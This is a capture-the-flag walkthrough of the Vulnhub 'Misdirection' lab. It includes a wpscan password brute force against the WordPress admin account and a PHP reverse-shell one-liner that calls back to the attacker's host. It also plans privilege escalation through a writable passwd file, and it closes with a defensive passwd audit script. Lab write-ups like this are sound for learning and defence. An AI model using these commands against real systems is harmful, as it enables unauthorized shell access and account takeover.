Vulnhub Misdirection Walkthrough

We start by scanning the host with nmap -A -T4 -p- 192.168.1.13 -vv

I scanned the host with dirb but found nothing important, then scanned it again, this time on port 8080:

The host is running WordPress, as we can see from the scan result, so we run wpscan --url http://192.168.1.13:8080/wordpress/ -e:

The scan result shows an admin account, so let's brute force it with

wpscan --url http://192.168.1.13:8080/wordpress/ -P /root/pass/rockyou.txt -U admin

After a while this turned out to be a waste of time, because 192.168.1.13:8080/debug gave a page

Then I was able to get a shell back to my machine:

php -r '$sock=fsockopen("192.168.1.11",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Here I transferred LinEnum.sh to the /tmp folder using wget and SimpleHTTPServer, and it gave me results.

We can see the user brexit can write to the passwd file, so we are going to create a new user with root privileges.
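From the defender's side, the weakness LinEnum reported here (a passwd file that a non-root user can write) and its usual result (an extra UID 0 account) can both be checked for directly. The script below is an added example, not part of the original walkthrough; the function names are hypothetical and the sample file in demo() is constructed.

```shell
#!/bin/sh
# Added example (not from the original post): audit a passwd-format file.
# Function names are hypothetical; the sample data in demo() is constructed.

# True when the file is writable by its group or by everyone.
is_loosely_writable() {
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print)" ]
}

# True when the file is not owned by root.
not_root_owned() {
    [ -n "$(find "$1" -prune ! -user root -print)" ]
}

# Names of accounts other than root that have UID 0.
extra_uid0_accounts() {
    awk -F: 'NF >= 3 && $3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Names of accounts whose password field is not a shadow/locked marker,
# i.e. a hash (or an empty password) lives in the passwd file itself.
inline_password_accounts() {
    awk -F: 'NF >= 3 && $2 != "x" && $2 != "*" && $2 !~ /^!/ { print $1 }' "$1"
}

# Print every finding for the given file (default /etc/passwd); return 1 if any.
audit_passwd() {
    f=${1:-/etc/passwd}; rc=0
    if is_loosely_writable "$f"; then echo "FINDING: $f is group- or world-writable"; rc=1; fi
    if not_root_owned "$f"; then echo "FINDING: $f is not owned by root"; rc=1; fi
    for u in $(extra_uid0_accounts "$f"); do echo "FINDING: extra UID 0 account '$u'"; rc=1; done
    for u in $(inline_password_accounts "$f"); do echo "FINDING: password field kept in $f for '$u'"; rc=1; done
    return $rc
}

# Demo on a constructed sample, so nothing on the real system is touched.
demo() {
    sample=$(mktemp)
    cat > "$sample" <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
svc:$1$constructed$notarealhash:0:0::/root:/bin/sh
EOF
    chmod 664 "$sample"
    audit_passwd "$sample" || true
    rm -f "$sample"
}
demo
```

Calling audit_passwd with no argument checks /etc/passwd; a healthy system prints nothing and returns 0.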
